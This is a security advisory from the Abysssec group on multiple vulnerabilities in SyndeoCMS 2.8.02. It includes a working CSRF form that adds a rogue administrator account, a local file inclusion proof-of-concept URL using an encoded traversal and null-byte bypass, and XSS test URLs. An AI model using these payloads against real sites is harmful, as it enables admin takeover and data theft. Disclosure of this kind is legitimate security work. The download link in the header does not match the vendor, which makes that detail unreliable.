Abysssec Research
1) Advisory information
| Title | Syndeocms 2.8.02 Multiple Vulnerabilities |
| Affected | syndeocms <= 2.8.02 |
| Discovery | www.abysssec.com |
| Vendor | http://www.syndeocms.org |
| Download | http://visinia.codeplex.com/releases |
| Impact | Ciritical |
| Contact | shahin [at] abysssec.com , info [at] abysssec.com |
| @abysssec |
2) Vulnerability Information
| Class | 1-CSRF 2-File inclusion 3-XSS 4-Stored XSS |
| Impact | An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Also it’s possible to download any sensitive data of CMS. |
| Remotely Exploitable | Yes |
| Locally Exploitable | Yes |
3) Vulnerabilities detail
1- CSRF – Add Admin Account:
With this vulnerability you can navigate the admin to visit malicious site (when he is already logged in) to add another admin account in server vulnerable location :
index.php?option=configuration&suboption=users&modoption=save_user&user_id=0
The Source of HTML Page (Malicious scrip) is here:
1 2 3 4 5 6 7 8 9 | <form action="index.php?option=configuration&suboption=users&modoption=save_user&user_id=0" method="POST"> <input class="textfield" name="fullname" type="hidden" value="csrf" /> <input class="textfield" name="username" type="hidden" value="abysssec" /> <input class="textfield" name="password" type="hidden" value=" abysssec " /> <input class="textfield" name="email" type="hidden" value="csrf@ abysssec.com" /> <select name="editor"> <option selected="selected" value="1">FCKEditor</option> <option value="2">Plain text Editor</option> </select> <input checked="checked" name="initial" type="checkbox" value="1" /> <input class="textfield" name="sections" type="hidden" /> <input name="access_1" type="radio" value="1" /> <input name="access_2" type="radio" value="1" /> . . . <input name="access_15" type="radio" value="1" /> <input name="m_access[0]" type="radio" value="1" /> . . . <input name="m_access[21]" type="radio" value="1" /> <input class="savebutton" name="savebutton" type="submit" value=" Save" /> </form> |
2- LFI (Local File Inclusion):
Vulnerable Code located in starnet\core\con_configuration.inc.php line 61-73:
1 2 3 4 5 6 7 8 9 10 11 12 | switch ($modoption) // start of switch { case save_css : if (IsSet ($_POST['content'])) { $content = $_POST['content']; } if (strpos($theme, "../") === FALSE) //check if someone is trying to fool us. { $filename = "themes/$theme/style.css"; |
Using this path you can include any file from server. PoC:
http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00
As you may noticed in code theme parameter is checked for “../” could be bypass by with “..%2F”.
3- XSS in starnet\core\con_alerts.inc.php file “email” parameter when “modoption” is “save_alert”
PoC:
http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2
4- Stored XSS in starnet\core\con_alerts.inc.php file “name” parameter when “modoption” is “save_alert” so you can put script in there and it will be store.
http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert